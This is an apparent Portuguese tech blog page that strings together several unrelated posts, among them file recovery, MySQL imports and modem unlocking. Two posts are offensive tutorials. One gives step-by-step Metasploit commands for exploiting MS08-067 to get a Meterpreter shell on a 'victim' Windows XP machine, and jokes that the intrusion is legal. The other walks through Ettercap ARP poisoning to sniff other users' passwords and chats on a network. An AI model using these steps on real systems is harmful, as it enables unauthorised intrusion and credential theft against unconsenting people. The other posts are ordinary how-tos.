segunda-feira, 28 de maio de 2012

Recuperando arquivos do pendrive


É muito fácil recuperar arquivos deletados dos cartões de memória, basta usar um programa pequeno e leve, que recupera as fotos apagadas, rapidinho!
Smart-Image-Recovery
Recupere as fotos de todos os tipos de cartões de memória, mantendo a qualidade original. É importante lembrar que você deve evitar sobrescrever o arquivo, evitando danificá-lo permanentemente.
Link para download confiável aqui O programa recupera dados em cartões de memóriapendrivescâmeras digitais e qualquer outro dispositivo portátil.
recuperar_fotos_cartao_memoria
Uma grande vantagem deste programa sobre outros similares, é que ele permite a recuperação de dados em partições NTFS e FAT, mesmo que as partições tenham sido formatadas.
Além das fotos, o programa também recupera: documentos, áudio e quaisquer outros tipos de arquivos que tenham sido deletados, mesmo que eles tenham sido excluídos da lixeira.
As rotinas e as ferramentas do programa são bem simples intuitivas, indicadas para usuários sem experiência neste tipo de recuperação. Esse programa roda em Windows NT, 2000, Millenium, XP e Vista.
Uma última dica: sempre faça backup de suas fotos, assim quando der algum problema, você garante que terá uma cópia de segurança.

Como importar arquivos SQL muito grandes para seu banco de dados

Após muitas tentativas frustadas de importar um aquivo .sql de 36,2mb via phpMyAdmin que sempre trava, por mais que eu aumentasse o max_size, parei para pensar um pouco. 

E se importasse diretamente no mySQL sem passar pelo phpMyAdmin?

Sim isto é possível, é muito mais fácil do que eu pensava, é tão fácil que estou até enrolando um pouco na introdução deste post antes de falar como faz, mas chega de enrolação, vamos lá: 

1. Acesse o prompt do mysql, como estou local pelo Wamp, clico no logo ao lado do relógio -> MySQL -> Console MySQL e informe a senha configurada para root, caso seja solicitado.

2. Acesse o Database ao qual deseja importar as tabelas. Caso esteja importando um .sql que irá criar o data-base ignore este passo.

3. Execute o comando source C:\dump_BD.sql 

Substitua o texto em itálico pelo local onde está seu arquivo .sql.

Pronto! No meu caso levou 10 segundos para que todas as instruções do arquivo .sql de mais de 36 mb foram importadas com sucesso.

Total de insert’s executados foi de 738.470 (setecentos e trinta e oito mil e quatrocentos e setenta registros)

Invadindo Windows XP com falha no NetApi

E agora, continuando minha jornada contra a Micro$oft, vamos explorar uma falha no Server Service (NetApi) que afeta desde o Windows 2000, passando pelo XP, Vista (...) e chegando no Server 2008.
Para ver detalhes sobre a falha no enorme boletim de segurança da Microshit, clique aqui.
Segundo o próprio boletim, "nos sistemas Microsoft Windows 2000, Windows XP e Windows Server 2003, um invasor pode explorar esta vulnerabilidade sem autenticação para executar código arbitrário." Em outras palavras, trata-se de um RComE (Remote Command Execution).
"Esta atualização de segurança é classificada como Crítica para todas as edições com suporte do Microsoft Windows 2000, Windows XP, Windows Server 2003 e como Importante para todas as edições com suporte do Windows Vista, Windows Server 2008." Só lamento...
Lembrando que atualizar o sistema pode corrigir a vulnerabilidade. O problema é que 'usuários comuns' geralmente não atualizam. <s>Eu mesmo estou com kernel 2.6.32 até hoje.</s>

A falha em si
CVE-2008-4250. O serviço Servidor não manipula corretamente as solicitações de RPC, fazendo com que um invasor possa assumir total controle do sistema.
RPC (Remote Procedure Call/Chamada de Procedimento Remoto) é um serviço de computação distribuída que permite que um programa chame um procedimento em outro computador da rede. O aplicativo envia o sinal ao servidor, que devolve o retorno.

O NetApi (serviço Servidor) suporta impressão e compartilhamento de arquivos, discos e impressoras.
A manipulação pobre desses pacotes pode levar à uma execução de códigos DOS com privilégios totais.

Explorando
Uma versão atualizada do Metasploit já possui o exploit. Com o número CVE, dado acima, é possível encontrá-lo de forma separada no próprio site do Metasploit.
É uma exploração simples e rápida, que ocorre sem o consentimento da vítima. Neste exemplo, vamos usar o payload bind_tcp (meterpreter).

Abra o terminal e vamos verificar se conseguimos acessar a porta 445 do alvo.
Se você estiver com pressa, vale rodar TCPing nas portas 445 e 139, usadas pelo NetApi.

Código:

$ tcping ip.do.al.vo 445
Se você ver a seguinte mensagem:

Código:
ip.do.alvo port 445 open.
Você vai poder continuar o tutorial.
Com mais calma, execute um Nmap:

Código:
# nmap -sS -p139,445 -O ip.do.al.vo
Com isso veremos se as nossas queridas portas estão abertas, e também teremos o sistema operacional do alvo. Verifique se ele está na lista divulgada no Boletim de Segurança da Microsoft (link acima).

Abra a linha de comando do Metasploit:

Código:
# msfconsole
Agora, vamos 'usar' o exploit:

Código:
> use windows/smb/ms08_067_netapi
As opções também são poucas. Com um 'show options' você pode vê-las. Vamos setá-las:

Código:
> set rhost ip.do.al.vo
Setamos o endereço IP do alvo, seguido do payload (usamos o bind_tcp apenas como exemplo):

Código:
> set payload windows/meterpreter/bind_tcp
Se for usar remote_tcp, será necessário setar também LHOST (seu IP) e LPORT (uma porta para ser aberta).

Agora, o golpe final:

Código:
> exploit
Você verá o 'Started bind handler' seguida de várias mensagens de log.
Caso tudo ocorra bem, o que é provável, você pode digitar 'help' para ver o que é possível fazer. Por exemplo:

Código:
> shell
Você verá o MS-DOS do usuário na sua frente. A partir daqui, você assume sua responsabilidade.

Até a próxima!

Nova lei: Invadir computadores protegidos é crime.
Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

Creditos : White Collar

Guia basico do Ettercap

O ettercap um programa classificado com sniffer, pois o mesmo captura dados em uma rede local. Farejadores como são conhecidos os sniffer eles capturam todo trafego da rede, com isso podemos capturar senhas digitadas por outros usuários de nossa rede. Analisando os dados podemos captura conversas de clientes de mensagem do tipo MSN ou outros clientes de mensagem instantânea, podemos ser usando com man-in-the-midler "MITM"(Homem no meio) e etc.

Primeiro passo e instalar o farejador(ettercap).
Ultima versão e 0.7.3 e temos disponível para SO Linux e Windows.

Windows:
http://sourceforge.net/projects/ette...aries/windows/

Linux:
Para distros baseadas no debian/ubuntu:

Citação:
# apt-get install ettercap-gtk
Para outras distribuições, temos que compilar os pacotes.

Citação:
# ./configure
# make
# make install
Vamos iniciar.

Próximo passo e iniciar o ettercap, para linux temos que inicia-lo em modo root, caso contrario não temos como selecionar a interface.



Sniffer > Unified Sniffing

Selecione a interface que está conectada à rede que você quer farejar, clique em"OK".

Host > Scan for hosts.
Na parte inferior da tela, como "Host list , são hosts adicionados" ( Os que estão listados abaixo são os micros que estão on-line na sua rede no momento).



Hosts > Host list
Agora aparecem os IPs das máquinas conectadas, é preciso ter em mente que o roteador também aparece (Lembrando que nosso micro não e mostrado).

Selecione o IP do seu computador para atacar e clique em "Add to Target 1", em seguida, o roteador "Add to Target 2".



Antes de começar o farejamento, e bom lembrar que a técnica usando e chamada de man-in-the-midler(Homem no meio), ai você me pergunta, mas como e isso? todos pacotes que saem do micro alvo, passam por minha maquina antes de chegar ao destino. É possível que a parti de algum tempo usando o MITM o host da vitima fique off por alguns segundos ate que as tabelas ARP sejam resetadas.

Mitm > ARP Poisoning - Agora clique na guia "Sniff remote connections" e clique em "OK"



Start > Start sniffing.



Estamos capturando o trafego de rede.

View > Connections - Aqui podemos ver todas as conexões e clique duas vezes em um pode ver os dados que ele contém, inclusive conversas, os usuários e senhas, etc.

Agora e deixar farejando. Xeque Mate!

Creditos : Bhior.

Desbloqueando Modems Huawei 3G







Você tem um modem 3g da Huawei de uma operadora, e deseja usar outra operadora mas não consegue por que ele está bloqueado? Siga este tutorial de desbloqueio da maioria dos modens 3g da Huawei, com isso você pode usar seu modem em qualquer operadora.


Os modens compatíveis com este tutorial são: E1550, E1553, E155, E156, E156G, E160, E160G, E161, E166, E169, E169G, E170, E172, E176, E180, E182E, E196, E226, E270, E271, E272, E510, E612, E618, E620, E630, E630+, E660, E660A, E800, E870, E880, EG162, EG162G, EG602…


Você quer usar seu modem com outra operadora, mas ele pede o código de desbloqueio que nem a imagem abaixo? Neste tutorial simples você irá aprender como desbloquear seu modem!





Entre no site http://a-zgsm.com/huawei.php
Digite o seu IMEI, o código de segurança e clique em Calculator.

O site irá gerar 2 códigos, o Unlock e o Flash, anote esses códigos.
Baixe o arquivo HUAWEI MODEM Code Writer
Execute o arquivo que você acabou de baixar, depois clique em Please Select Com Port

Clique em Detect, selecione a porta COM e depois clique em Accept

Clique em Unlock Modem, digite o Código de Desbloqueio que você anotou anteriormente e clique em OK
Pronto! Seu modem foi desbloqueado com sucesso!

Após o desbloqueio vamos configurar as bandas. Abra o software de sua operadora e clique em ferramentas/opções. No gerenciamento de perfil adicione o perfil de acordo com o seu plano.

Perfil de conexão 3G da Vivo:
Nome do perfil: VIVO ZAP
APN:
selecione “Estático”
APN: zap.vivo.com.br
Autenticação
Número de acesso:*99#
Nome do usuario: vivo
Senha: vivo
Avançado…..
Configurações IP: selecione “Dinâmico”
Configurações do protocolo de autenticação: selecione “PAP”
Configurações DNS:selecione “Dinâmico”
Configurações WINS:selecione “Dinâmico”
clique em “OK”
Agora clique em “Salvar”

Perfil de conexão 3G da TIM:
Nome do perfil: TIM WEB
APN:
selecione “Estático”
APN: tim.br
Autenticação
Número de acesso:*99#
Nome do usuario: tim
Senha: tim
Avançado…..
Configurações IP: selecione “Dinâmico”
Configurações do protocolo de autenticação: selecione “CHAP”
Configurações DNS:selecione “Dinâmico”
Configurações WINS:selecione “Dinâmico”
clique em “OK”
Agora clique em “Salvar”



Perfil de conexão 3G da CLARO:
Nome do perfil: CLARO 3G

APN:
selecione “Estático”
APN: bandalarga.claro.com.br se não conectar tente com ” java.claro.com.br ”
Autenticação
Número de acesso:*99***1#
Nome do usuario: claro
Senha: claro
Avançado…..
Configurações IP: selecione “Dinâmico”
Configurações do protocolo de autenticação: selecione “CHAP”
Configurações DNS:selecione “Dinâmico”
Configurações WINS:selecione “Dinâmico”
clique em “OK”
Agora clique em “Salvar”

Perfil de conexão 3G da OI:
Nome do perfil: OI VELOX 3G

APN:
selecione “Estático”
APN: gprs.oi.com.br
Autenticação
Número de acesso:*99***1#
Nome do usuario: oi
Senha: oi
Avançado…..
Configurações IP: selecione “Dinâmico”
Configurações do protocolo de autenticação: selecione “CHAP”
Configurações DNS:selecione “Dinâmico”
Configurações WINS:selecione “Dinâmico”
clique em “OK”
Agora clique em “Salvar”

Como desbloquear qualquer celular de qualquer operadora.



No ie, acesse o site da Anatel (Agência Nacional de Telecomunicações).

Acesse a opção Fale Conosco, que fica em uma barra na parte inferior da página;

Entre na opção Atendimento Eletrônico;

Uma página com conexão segura mas sem certificado de autenticação irá abrir, adicione-a como uma página segura e continue;

Faça o seu cadastro clicando na opção Ainda não sou cadastrado, isso abrirá uma janela solicitando que você fornceça o seu CPF. Ao clicar nesta opção usando o Firefox, parece que nada acontece. Caso esse bug vergonhoso aconteça, abra a página utilizando o Internet Explorer;

Ao acessar a tela de cadastro, preencha o campo email e clique em próximo. As informações referentes ao desbloqueio são enviadas via email, por isso, forneça um endereço de email válido;

Cique em próximo e preencha os campos obrigatórios restantes, o cadastro é chato e extenso, mas é por uma boa causa. Clique em confirmar no final do formulário e aguarde o carregamento da página de confirmação do cadastro;

Após a confirmar do seu cadastro, feche a janela do formulário e abra a sua conta de email, as informações de login e senha serão enviadas para o endereço cadastrado com o assunto: Anatel – Confirmação de auto-cadastramento. Caso o email não chegue depois de alguns minutos, verifique se a mensagem não foi parar na sua caixa de spams;

Volte novamente a página inicial do sistema e informe o seu CPF e a senha que você recebeu pelo email. O login neste caso não é necessário;

Após realizar o login, acesse a opção Fale Conosco, aceite o termo de responsabilidade e clique em Cadastrar Solicitação;

Em Tipo de Atendimento selecione: Pedido de Informação;

Em Serviço: Selecione Telefonia Móvel;

Em Modalidade de Serviço: Selecione Pré ou Pós;

Em Motivo: Selecione Desbloqueio;

Em Submotivo: Selecione Do aparelho;

Em Categoria: Selecione: Outros;

Após essa longa peregrinação, um formulário se abrirá e basta então selecionar em Reclamado a operadora a qual o celular se encontra preso (bloqueado);

No campo Mensagem, digite o IMEI do seu celular (para saber qual é o IMEI do seu celular basta digitar *#06# no aparelho como se você fosse realizar uma ligação e o IMEI aparecerá);

Por via das dúvidas, preencha também na mensagem qual é a operadora e a marca e modelo do celular que você deseja desbloquear. Depois e só clicar em confirmar e pronto.

Dentro de 5 dias úteis você receberá o código de desbloqueio do aparelho via email. Em alguns casos você receberá a ligação da operadora informando o código de desbloqueio.

Para realizar o desbloqueio, basta inserir o chip de outra operadora no celular e ligá-lo. Ao ligar, forneça o código de desbloqueio enviado pela Anatel e aproveite o seu aparelho desbloqueado.